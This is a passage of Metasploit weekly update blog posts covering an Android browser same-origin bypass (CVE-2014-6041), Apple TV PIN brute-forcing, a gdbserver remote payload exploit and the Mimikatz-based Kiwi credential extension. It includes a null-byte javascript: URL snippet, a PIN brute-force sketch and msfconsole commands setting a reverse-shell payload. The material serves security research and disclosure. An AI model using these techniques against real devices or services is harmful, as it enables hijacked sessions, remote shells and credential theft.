  7. Add the badge to your README: [![PullReview stats](<GITHUB_USER>/<GEM_NAME>/badges/master.svg?)](<GITHUB_USER>/<GEM_NAME>/reviews/master), which is a bit cooler than the CodeClimate badge.


So, that's everything.  Don't be intimidated by the length of this article: it takes about a day or less for me to set this all up on new projects.  If there are open source tools you think Metasploit should be using (such as a static analysis tool that can handle metasploit-framework and our odd Metasploit module format), let us know in the comments below.

On the night of September 7, 2014, Joe Vennix of Rapid7's Metasploit Products team wrote, "I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window [...]" and provided a Metasploit module to exploit this condition. After some of the usual testing and confirmation of the vulnerability, this module is available in all versions of Metasploit.


The vulnerability that Joe didn't believe is CVE-2014-6041, disclosed on September 1, 2014 by Rafay Baloch on his blog, Rafay Hacking Articles. By malforming a javascript: URL handler with a prepended null byte, an attacker can bypass the Android Open Source Platform (AOSP) Browser's Same-Origin Policy (SOP) browser security control.
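For the curious, the attack string itself is tiny. Here's a minimal sketch in Ruby of the malformed URL at the heart of the bug (illustrative only; the real exploit, like the Metasploit module, delivers it from an attacker-controlled page as HTML and JavaScript):

```ruby
# CVE-2014-6041: a javascript: URL with a prepended null byte slips past
# the AOSP browser's origin check, so the injected script runs with the
# origin of the targeted frame instead of being blocked by the SOP.
evil_url = "\u0000javascript:alert(document.domain)"

# A patched browser refuses cross-origin javascript: navigation outright;
# the vulnerable browser executes this one inside the victim frame.
```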


What this means is, any arbitrary website (say, one controlled by a spammer or a spy) can peek into the contents of any other web page. Imagine you went to an attacker's site while you had your webmail open in another window -- the attacker could scrape your e-mail data and see what your browser sees. Worse, he could snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.


This is a privacy disaster. The Same-Origin Policy is the cornerstone of web privacy, and is a critical set of components for web browser security. Oh, and it gets worse.


When this vulnerability was announced by Baloch, it was met with... total silence. There has been no acknowledgement of the bug from Google, as far as we can tell. There's no listing of this bug on CVE Details' readout of Android issues, and no chatter (that we could find) in the Android security community about this bug.


Research and testing are still ongoing to plumb the depths of this issue. We'd like to pin down exactly when the bug was fixed, and to determine just how widespread this vector really is. After all, pre-4.4 builds of Android account for about 75% of the total Android ecosystem today.


More importantly, 4.2 (Jellybean) and prior phones account for nearly 100% of off-the-shelf, lower-end prepaid phones from major manufacturers and carriers. They still ship the unsupported AOSP browser. These are the kinds of phones that account for a huge chunk of total market share, and yet are still vulnerable to this bug and the WebView addJavascriptInterface vulnerability.


While the AOSP browser has "been killed off" by Google, it is wildly popular, even on modern devices used by sophisticated users who prefer the stock browser over Google Chrome, Firefox, Dolphin, or other browsers. A quick search for "AOSP browser" turns up page after page of instructions and HOWTOs on re-installing this defunct, unsupported-by-Google software. Among the top pages, I could find absolutely no mention of security concerns in reinstalling the original stock browser.


Later this week, I'll have a demo of the bug all video'ed up that's sufficiently shocking. I'd really like to continue the conversation about security for mid- to low-end devices that people trust with the details of their lives. I hope this Metasploit module (which is available today in all versions of Metasploit) spurs along the conversation on what we can do to ensure that the users of normal, off-the-shelf, brand-new phones aren't so vulnerable to privacy violations.


Edit: Changed Rafay's disclosure date to September 1, 2014. This appears to be more accurate when considering the GMT timezone. Clarified that the AOSP browser "has been killed off," not all of AOSP.

Apple TV Tricks

This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them.


Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (under $100 typically) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, and almost certainly without any kind of formal IT control or asset management or anything like that.


Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Rarely, you'll find an Apple TV device set up with a proper password.
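To see just how trivial that brute force is, here's a toy sketch in Ruby. This is not the Metasploit module; the block stands in for a real pairing attempt against the device, and the keyspace is only 10,000 values:

```ruby
# Enumerate every possible four-digit OnScreen PIN. Even at a painfully
# throttled one guess per second, the whole keyspace falls in under
# three hours; unthrottled, it falls in seconds.
def brute_force_pin
  (0..9999).each do |n|
    pin = format('%04d', n)   # zero-padded candidate, e.g. "0042"
    return pin if yield(pin)  # stand-in for one pairing attempt
  end
  nil
end

secret_pin = '4812'  # hypothetical PIN shown on the TV screen
found = brute_force_pin { |pin| pin == secret_pin }
# found == "4812"
```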


What's the risk? Well, if the display is in some public location, and is being used for Serious Business(tm), a prankster can of course cause all kind of hijinks, from obvious (fill in your own shocking WTF image here), to subtle (how about quietly replacing one financial results spreadsheet with another, on the fly)?


Ultimately, though, we hope that research like this just brings some awareness to the coming Internet-of-Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers. If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer in some kind of sensible and user-friendly security-by-design on these things, how can we possibly expect newcomers with the next big IoT fad to fare any better?

The GDB Protocol

Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward - write a payload somewhere in RWX memory and execute. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it.
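For a sense of what the mixin speaks on the wire, here's a minimal sketch of GDB Remote Serial Protocol packet framing. The framing rules come from the GDB RSP specification; the helper name is our own:

```ruby
# Every gdbserver command travels as $<payload>#<checksum>, where the
# checksum is the 8-bit sum of the payload bytes, rendered as two hex
# digits. Writing the payload into RWX memory uses 'M<addr>,<len>:<hex>'
# packets, followed by a continue.
def gdb_packet(payload)
  checksum = payload.bytes.sum % 256
  format('$%s#%02x', payload, checksum)
end

gdb_packet('g')        # => "$g#67" (read registers, e.g. to discover $PC)
gdb_packet('vCont;c')  # => "$vCont;c#a8" (resume execution)
```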


There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure that the exploit module only used features in the required set.


The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver we at least won't crash the target - just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary X86 linux box:


msf> use exploits/multi/gdb/gdb_server_exec

msf> set payload linux/x86/shell_reverse_tcp

msf> set LHOST

msf> run


Right now, X86 and X86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so!


Hack my Dogecoin (Such Doxing. Wow.)

This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it's apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor for any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check if you can pick it up by using your phone's usual over-the-air (OTA) update process.



Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic.


New Modules

Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun.


Exploit modules

Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.


Weekly Metasploit Update

Posted by todb Employee Sep 5, 2014

Loginpalooza, the Great Credential Refactor

In August, we ran a little contest here in the People's Republic of Metasploit to see about converting a pile of credential-gathering modules to the new LoginScanner mixin after the release of Metasploit 4.10. Today, I'm happy to announce the winners:


First place goes to Tom Sellers, for his work on a number of modules and constant feedback and question-asking on how the heck to do all this stuff. In return, we'll be sending him a delightful Wifi Pineapple Ultra Bundle -- try not to get it pwned by @ihuntpineapples!


Second and Other Second place goes to Chris Truncer and 0a2940, for their work on the IP board and AppleTV modules. Since they both ended up at pretty much the same place with their work, and were super useful in teasing out documentation and functionality issues with the new credential module authoring process, we'll be sending both of them a second place prize of an OnionPi (just as soon as they're back in stock).


These open source contributors really dove in and helped us out a lot by actually working with the new LoginScanner mixin and the Credential Gem. We still have work to do to get these components more developer friendly, so keep an eye on that work as we make progress for total conversion.


Retiring Redmine

A couple weeks ago, I kicked off an informal Twitter poll:



Well, the response was overwhelmingly in favor of GitHub Issues as a replacement. I do love Redmine, don't get me wrong -- it's pretty amazing project planning and issue tracking software, and it's open source, and it's written in Ruby, so what's not to love?


As it turns out, we kind of live and breathe on GitHub these days, we use Pull Requests pretty extensively, and GitHub Issues recently saw a pretty amazing update that makes labelling, searching, and sorting on issues a delightful experience. You can read all about that here. GitHub Issues just offers us much better integration with the way we do things already, so I'm pretty thrilled about the move.


So, over the next few weeks, we'll be retiring our beloved Redmine server at We've gone through and triaged some dozens of Redmine bugs to move over to GitHub (and you can see which ones using this search for Framework and this one for Meterpreter), and will be making the call on the rest soon.


If you have a favorite issue or feature request that you can't live without on GitHub, and it's not yet on that list, please feel free to re-create the issue on GitHub. As it stands, we're assuming bugs that are over a year old (pre-4.8.0) probably aren't show-stoppers or have already been fixed in the last couple releases. We'll have time to make sure this is the case, and don't worry, we won't be deleting any of Redmine's historical data.


That all said, the moral of the story here is that the switch over to end-to-end GitHub should make the whole issue/bug/fix workflow a lot smoother and more reliable for both our internal and external developers, and I'm excited to be injecting a little more efficiency in the whole Metasploit donut-making process.


Note that Metasploit Community, Express, and Pro users should still stick to their support contacts here at Rapid7 and SecurityStreet (especially for "how do I..." sorts of questions). Those resources aren't going away anytime soon.


Meterpreter Kiwi Extension

Last but in absolutely no way least, Metasploit now boasts the mighty Kiwi Extension! Kiwi is the Meterpreter and Metasploit integration of all the available Mimikatz techniques for dumping credentials from memory on fully-patched Windows machines. Thanks to the heroic efforts of OJ TheColonial Reeves and Benjamin gentilkiwi Delpy, and the nattering and gnashing of teeth from Rob mubix Fuller and Josh kernelsmith Smith. Thanks guys!


New Modules

Since the last release, we've only two new modules this week. While it may seem a little light, the last release, 2014082701, was actually staged up on Friday afternoon (and not the usual Monday cut). This was to ensure we were able to address the outstanding issues involving a database-less use of msfconsole and msfcli. The downside is, sadly, only allowing for one weekend for new modules this week -- over a US holiday, no less. But, you should update anyway! The Rsync auxiliary module is pretty fun to use, and brings some security attention to an often-used, but often-misunderstood, backup infrastructure technique.


Exploit modules

Auxiliary and post modules


For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes. Thanks Chris!
